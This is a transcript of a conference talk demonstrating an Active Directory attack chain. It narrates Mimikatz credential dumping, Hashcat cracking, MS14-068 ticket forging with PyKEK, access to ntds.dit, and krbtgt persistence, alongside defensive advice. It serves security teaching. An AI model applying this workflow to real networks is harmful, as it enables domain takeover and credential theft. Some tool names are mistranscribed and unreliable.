I believe we need to have the debug privileges. Oops, that's a typo. That's why we do the copy pasting, right? Privilege debug. So that means I'm granting this tool to have debug privileges inside Windows.

36:40

And I know there's a lot of .NET developers here. So you might know what the debug privilege means for a user in Windows. Local administrators normally have debug privileges. It means that a process can interact with another process, debugging it, and also having its code run inside other processes' code

37:03

and even access the memory space of those processes. So that's what we're doing here. If we didn't have local admin in this case, it wouldn't happen. So let's cover that in a bit, okay? Then we'll do secure LSA, log on password. Again, typo.

37:20

Let's just do the copy pasting, Chris. It's no problem. Much easier to just do copy paste. We'll tell Mimiket to look for log on passwords. And we have a long list of outputs. Let's look at these things. The first thing we have is an interactive log on to the computer from the administrator.

37:41

And this user has no password. Interesting. There is a hash here that we could crack or we could use as an authentication mechanism. But still, there's no password in clear text. That's because Windows Server 2012 R2 actually has something called protected admin. So they try not to store the user's clear text password

38:03

in memory. So it's a really good security feature added by Windows. And let's look for different things here. Oh, look at this. Suddenly, we have the web user, the password in clear text. Because that user wasn't covered

38:22

by the protected admin module. So Mimiket simply took the password straight out of memory, and we could use this for remote authentication. That's no fun, is it? It's just having the password in clear text? Nah. So this NTLM hash that I've highlighted is the password representation, right?

38:42

So let's just pretend we don't have any clear text password, okay? Let's crack this little sucker. So for cracking, I will be using a tool called Hashcat. Hashcat will interact with my GPU, and it will try super many.

39:01

It will actually try to crack, it will try to crack 66,000 plus three zeros, like 66 millions, 6.6 million passwords a second. It's gonna try cracking the hash.

39:21

So I have a word list, right? With 58 million words in it. My word list will be what we call mangled. So I'm gonna try Leetspeak replacement. So every I will be replaced with an one. Every, I will add exclamation marks. I'll automatically add like 2016 behind every word,

39:41

and I'll crack it. And running this GPU tracking tool, it's super quick, and we can see that the password cracked almost instantly. This hash, which I copy pasted, represented the password manager 007. So really, from here, all we have to do, hopefully,

40:01

is try to authenticate. Oh, that's the domain controller. Let's see. User name is correct, so let's do manager 007. Aha. So we can suddenly log on to the web server. That's cool. And as any good attacker does,

40:22

the first thing you do when you hack something is you bring up the terminal window. Because you don't really need a GUI, right? You really don't need a GUI. Let's see, yeah, so we are running as this user, let's see, late web. So that's interesting. We can now browse through the system. We could look for network machines

40:42

if there's anything on here. Look through your local disk. Look through the scripts that is hosted from, for example, Apache. So we can basically do whatever access this user has. From the GUI, a lot of people appreciate the GUI, but we don't really need it, as you've seen. So let's cover some defenses for this,

41:02

because it's kind of important. Kind of important not to have this happen to your environment. First of all, believe it or not, antivirus could help, all right? It could help. So we'll bypass antivirus, no problem, okay? Any time of the week, we'll bypass antivirus.

41:22

However, we're lazy. Attackers are very often lazy. So they'll get caught a couple of times by the antivirus while they're trying and failing. And that will create alarms in your environment. So hopefully your IT operations will actually react to those alarms, and check out why this web server

41:40

is acting strangely, right? Also, your firewall rules should never allow a server to talk to the internet. Why would your servers be allowed to talk to anyone on the internet? It's quite stupid. You should allow connections coming in, and you should allow your server to reply to those connections.

42:00

That's a stateful firewall, right? But you should not allow this web server to initiate connections to anyone on the internet. That's just bad practice. And again, our user, the web user, was a local admin. And that's interesting. Why was it a local admin? Well, turns out that IT operations have big problems with permissions.

42:24

Windows permissions is hell. And basically to fix the problem, they just gave the user all the permissions, and it worked. And they're like, ha, that's convenient. And they lost it like that. But this user is not domain admin, okay? So he doesn't have any access

42:41

except access to the web server. While domain admin access means access to the entire kingdom, keys to the kingdom, okay? So we're gonna go back to the demo and look at how can we use our access to elevate our privileges to become domain admin.

43:00

That's our next goal. So let's look at this server again then. We'll be using, we can use, let's see, close this one. I think we can just use the RDP. That should work because, I mean, it's a legitimate connection, right? We are the hacker, we're on top of the server.

43:22

So let's see, let's go back to our files and see which other files we have on our system. So when I uploaded files, my little toolkit, my kit, we also uploaded something called a PyCAC. Does anyone know what a PyCAC is? It's a Python Kerberos exploit kit.

43:44

And Kerberos is authentication protocol for Microsoft and Windows machines, right? Microsoft Windows machines. Those are most likely all using Kerberos for authentication, it's quite good protocol. However, in 2014, late 2014,

44:01

there was a Windows update patch. You guys know those, right? Windows updates? They're kind of important, actually. There was one patch, MS14-068. So 14 means that it was released in 2014 and 68 is the number they've given it. It was a vulnerability that allowed anyone

44:23

to create a fake Kerberos authentication ticket pretending to be domain admin. Huh, that is bad. Any domain user can suddenly become king in your environment. Can you imagine that? If you don't patch that immediately,

44:42

any willy-nilly script kitty or anyone who wants to take full access to your kingdom could do it, just like that. And I'll show you just like that. It would be kind of embarrassing if this demo failed right now. As I probably, it's just gonna be like that. I mean, I can't do it, right? So let's run up PyCAC and let's see what it's all about.

45:03

So I've downloaded the proof of concept code that will allow me to run this code. This little file, I'll run it first. Let's see how it behaves. I think we have time, looks good. Ooh, sorry, Python.

45:28

So this script requires some parameters. First of all, it requires the SID, the user's SID. Then it needs to have the domain controller's IP address and the domain we're talking to.

45:41

So the SID is basically this long string up here. So it's no secret. It's just your unique identifier to the domain. So it's not really a lot of advanced stuff going on here. So I'm going to give these parameters to the tool. Let's see if we can create a ticket.

46:02

And it requires a password. So that's the interesting thing, right? We need to have some kind of password in clear text. And our password was? Yes, manager 007. I had my demo fail once because I typed in master 007 multiple times. Manager 007, I will never do that mistake again.

46:23

So it gives us a lot of done messages. Looks good, right? We type dir and we have a little file here. This file is basically a ticket granting ticket. It's basically a ticket giving us authentication. But it's just as a file, right? We need some way to load it into the system.

46:42

Actually, we'll be loading it into memory. And we'll be doing that using a different tool called Mimikatz, which has a lot of Kerberos interaction modules as well. So Mimikatz supports interacting with Kerberos tickets and we'll use Mimikatz to push this ticket inside our memory.

47:03

So let's cd into the correct directory. Oh well. Mimikatz shrunk. So Mimikatz can be run interactively or it can be run from the command line.

47:20

Right now, I'll run it strictly from the command line, giving it the parameters to pass this ticket into memory and I'll point it to SQL slash users and our user, the user file I just created, the ticket file and I'll exit immediately. Let's try this. Actually, wait. Before I do, I promised you I wasn't domain admin, right?

47:43

Challenge me. Like, no, he's lying, he's probably domain admin. All right? Yes, I'm not a domain admin. So let's check, okay? Let's do check net user group domain admins and see. The users in the domain admin group is administrator.

48:02

Only one user, right? Let me try also net use. Let me copy that command because my host name for the domain controller is hilariously bad. Let me try to mount the C drive, okay? The C drive of the domain controller. You shouldn't be able to interact with that drive

48:20

and browse the files unless you have permissions and as you can see that it's giving me the prompt to enter your username and password. That means it already tried your credentials as the lead web user and it didn't work so please give me the permissions. We'll cancel out that and that's a proof of concept. I just showed you, we don't have access, right?

48:42

And let's now load this little ticket into memory. Let's see, there it is. Looks good. Did you see that? You never know what kind of information

49:00

you will be showing people. So I just listed out my tickets and to be honest it looks good. Let's try the net use again. Basically I'm mapping a network drive. Nope. Let's see, win, win, win, win, win, win, win. Okay, let's do this again. I just removed all tickets.

49:22

Oh, it doesn't work. So I said it would be embarrassing if it didn't work and it's actually quite embarrassing right now. But just give me a second to debug. Let's see, let's see. We have, let's see. I think we need to look at our ticket. Let's see how our command ran. Let's see. This one, let's see. We're giving it this Python script.

49:42

We're giving it a username, a domain. We're giving the Sid, and I verified the Sid early today, it should work. And the domain, lead host. So that should work. Let's actually create another ticket because I think something went wrong. You never know. And these things, they've been written to be easy

50:01

but they're not like super robust. You never know, right? Let's see. It's running one more time. Nope, wrong command. Let's see, we have our command up here. This one.

50:21

And to be honest, it looks good to me. Manager 007, that's my password by the way. So check it out, try out my LinkedIn and so on. I'm just kidding. And yeah, it did say done on everything. So let's go back to Mimikatz. Let's try it one more time. If it doesn't work, I'll show you guys still.

50:42

So don't worry about it. So, now I want to purge my tickets first. Just remove all the tickets, all the authentication tickets you already have on the system. Just remove those so you have a clear, clean slate, right? Looks good, lead web, lead host.

51:03

Would be cool if it actually works. The honest truth though is I tested this like 30 minutes before I came down here for a demo. And I rebooted just to make sure that there wasn't any caching going on. Ah, and it worked, right? Nice, thank you, thank you.

51:23

Nice, nice. So let's browse the domain controller. Let's look in the Windows directory. Let's look in system 32. Let's look for a very specific file that is called ntds.dit. This file, 8.4 gigabytes.

51:40

What file is this? AD, this is Active Directory, okay? Copy this file back to your own system. You have all the user hashes of all the users in the domain, all right? Let's just look at a couple of things here. So, what went wrong?

52:01

We forgot Windows Update. I have clients that refuses to patch domain controllers because they are afraid they will crash while they are doing so. If the domain controllers go down, everything goes down. So their most vulnerable services in the entire organization, multinational companies,

52:21

is the domain controller. So I had them patch this, specifically this. I forced them to patch this. So definitely, Windows updates matter. But I want to bring up a scenario which I'm not gonna demo because it takes a little while. But with this AD dumped, I have a very specific of special users password hash,

52:45

the krbtgt user. This user is a user that creates tickets. If I have that user's hash, I can basically create tickets to my own on demand whenever I want to. And I can create tickets that will grant me 10 years,

53:02

for example, of domain admin to your environment. And how do you fix that? Well, it turns out that if you change your krbtgt hash, the password, if you change the password, two times my ticket will be invalidated. And I would have to hack them again and dump the hash.

53:23

But two times, it goes two times because the password rotation and the history, it has to rotate so it doesn't remember the hash I had when I dumped it. If you try to reset that user two times, you're gonna have hell. It's not gonna be pretty. Your link is gonna die, exchange is probably gonna die.

53:43

You're gonna have stuff happening that you can't explain. Because so many things are relying on having week-long tickets in their systems. So when suddenly all the tickets are invalidated, things stop working. So normally you would have to wait a week and then reset the second time, giving the attacker a lot of time to regain his foothold,

54:05

dump the hashes again, try to compromise different users, compromise domain admins that didn't reset their password, and so on. It's really, really hard to recover from. All right, so I think we're on time. Is there any questions? Because we have five minutes, don't we? Five minutes, yeah?

54:22

Is there any questions on these hacking activities? I expect there to be questions because I'm Norwegian and you're Norwegians and everyone is saying that Norwegians, they don't ask questions. So bring it on, come on, go. Ooh, definitely you could, but not on a domain controller.

54:43

So this patch is for the domain controller, but I love the idea, though, to uninstall the protective mechanisms. We do that for AV sometimes when we have local admin. Good question, right? Are you a Norwegian? Ah, represent.

55:00

Nice. Anyone else before we finish? Okay, go. So very valid question. So this tool is open source, so you can go manually and review the source code. For many of my tools and my team, we actually do source code review before we use tools, especially new tools that have just been released.

55:22

There are multiple cases online where we're seeing people releasing some kind of tool and it's actually infected, right? So you suddenly have access to a security researcher's PC because they were dumb enough to run your tool without checking it. But tools such as Metasploit, Metrapeter, MSF Venom,

55:40

those have been scrutinized by the security industry for many, many, many years. It's a very highly renowned company called Rapid7, which is developing it, and they have a quite good reputation, so to speak, right? So that's nice, at least. That gives you some assurance. Anyone else? Right?

56:01

So thank you very much, everyone. I'm glad we got a full pack of people in here. Thank you very much.